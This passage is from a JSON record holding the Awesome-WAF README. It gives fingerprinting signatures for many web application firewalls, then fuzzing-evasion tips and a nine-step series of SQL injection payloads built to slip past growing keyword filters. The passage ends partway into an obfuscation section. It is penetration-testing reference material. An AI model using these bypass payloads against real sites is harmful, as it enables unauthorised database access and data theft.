\u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eApache Protected By WebLand WAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WebRay\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eWebRay-WAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eResponse headers may have \u003ccode\u003eDrivedBy\u003c/code\u003e field with value \u003ccode\u003eRaySrv RayEng/{version}\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WebSEAL\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003eWebSEAL\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eThis is a WebSEAL error message template file\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eWebSEAL server received an invalid HTTP request\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WebTotem\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eThe current request was blocked by WebTotem\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e \n \u003ctr\u003e\n \u003ctd\u003e\n West263CDN\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eX-Cache\u003c/code\u003e header field with \u003ccode\u003eWT263CDN\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e \n \u003ctr\u003e\n \u003ctd\u003e\n Wordfence\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eWebKnight\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eGenerated by Wordfence\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eA potentially unsafe operation has been detected in your request to this site\u003c/code\u003e text warning.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYour access to this site has been limited\u003c/code\u003e text warning.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThis response was generated by Wordfence\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n WTS-WAF\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page title has \u003ccode\u003eWTS-WAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003ewts\u003c/code\u003e as value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e \n \u003ctr\u003e\n \u003ctd\u003e\n XLabs Security WAF\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eX-CDN\u003c/code\u003e header field with \u003ccode\u003eXLabs Security\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e \n \u003ctr\u003e\n \u003ctd\u003e\n Xuanwudun WAF\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains reference to \u003ccode\u003ehttp://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/\u003c/code\u003e site URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Yunaq Chuangyu\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page has reference to:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003e365cyd.com\u003c/code\u003e or \u003ccode\u003e365cyd.net\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eReference to help page at \u003ccode\u003ehttp://help.365cyd.com/cyd-error-help.html?code=403\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Yundun\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eYUNDUN\u003c/code\u003e as value.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eX-Cache\u003c/code\u003e header field contains \u003ccode\u003eYUNDUN\u003c/code\u003e as value.\u003c/li\u003e\n \u003cli\u003eResponse page contains \u003ccode\u003eBlocked by YUNDUN Cloud WAF\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains reference to \u003ccode\u003eyundun.com/yd_http_error/\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Yunsuo\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains image class reference to \u003ccode\u003eyunsuologo\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse headers contain the \u003ccode\u003eyunsuo_session\u003c/code\u003e field name.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n YxLink\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse might have \u003ccode\u003eyx_ci_session\u003c/code\u003e cookie field.\u003c/li\u003e\n \u003cli\u003eResponse might have \u003ccode\u003eyx_language\u003c/code\u003e cookie field.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eYxlink-WAF\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ZenEdge\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains reference to \u003ccode\u003e/__zenedge/assets/\u003c/code\u003e directory.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003eZENEDGE\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eBlocked response headers may contain \u003ccode\u003eX-Zen-Fury\u003c/code\u003e header.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ZScaler\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header has value set to \u003ccode\u003eZScaler\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eAccess Denied: Accenture Policy\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttps://policies.accenture.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eReference to image at \u003ccode\u003ehttps://login.zscloud.net/img_logo_new1.png\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYour organization has selected Zscaler to protect you from internet threats\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThe Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n\u003c/table\u003e\n\n## Evasion Techniques\nLets look at some methods of bypassing and evading WAFs.\n\n### Fuzzing/Bruteforcing:\n#### Method: \nRunning a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:\n- Wordlists specifically for fuzzing \n - [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).\n - [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)\n - [Other Payloads](https://github.com/foospidy/payloads)\n\n#### Technique:\n- Load up your wordlist into fuzzer and start the bruteforce.\n- Record/log all responses from the different payloads fuzzed.\n- Use random user-agents, ranging from Chrome Desktop to iPhone browser.\n- If blocking noticed, increase fuzz latency (eg. 2-4 secs).\n- Always use proxychains, since chances are real that your IP gets blocked.\n\n#### Drawbacks:\n- This method often fails. \n- Many a times your IP will be blocked (temporarily/permanently).\n\n### Regex Reversing:\n#### Method:\n- Most efficient method of bypassing WAFs.\n- Some WAFs rely upon matching the attack payloads with the signatures in their databases.\n- Payload matches the reg-ex the WAF triggers alarm.\n\n#### Techniques:\n\n### Blacklisting Detection/Bypass\n\n- In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted.\n- The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords.\n\n__Case__: SQL Injection\n\n##### • Step 1:\n__Keywords Filtered__: `and`, `or`, `union` \n__Probable Regex__: `preg_match('/(and|or|union)/i', $id)` \n- __Blocked Attempt__: `union select user, password from users`\n- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`\n\n##### • Step 2:\n__Keywords Filtered__: `and`, `or`, `union`, `where` \n- __Blocked Attempt__: `1 || (select user from users where user_id = 1) = 'admin'`\n- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`\n\n##### • Step 3:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit` \n- __Blocked Attempt__: `1 || (select user from users limit 1) = 'admin'`\n- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`\n\n##### • Step 4:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by` \n- __Blocked Attempt__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`\n- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`\n\n##### • Step 5:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select` \n- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`\n- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`\n- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`\n\n##### • Step 6:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'` \n- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`\n- __Bypassed Injection__: `1 || user_id is not null`\n- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`\n- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`\n\n##### • Step 7:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex` \n- __Blocked Attempt__: `1 || substr(user,1,1) = unhex(61)`\n- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`\n\n##### • Step 8:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr` \n- __Blocked Attempt__: `1 || substr(user,1,1) = lower(conv(11,10,36))`\n- __Bypassed Injection__: `1 || lpad(user,7,1)`\n\n##### • Step 9:\n__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space` \n- __Blocked Attempt__: `1 || lpad(user,7,1)`\n- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`\n\n### Obfuscation:\n#### Method:\n- Encoding payload to different encodings (a hit and trial approach).\n- You can encode whole payload, or some parts of it and test recursively.\n\n#### Techniques:\n__1. Case Toggling__\n- Some poorly developed WAFs filter selectively specific case WAFs.\n- We can combine up","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xInfection%2FAwesome-WAF","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xInfection%2FAwesome-WAF","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xInfection%2FAwesome-WAF/lists"}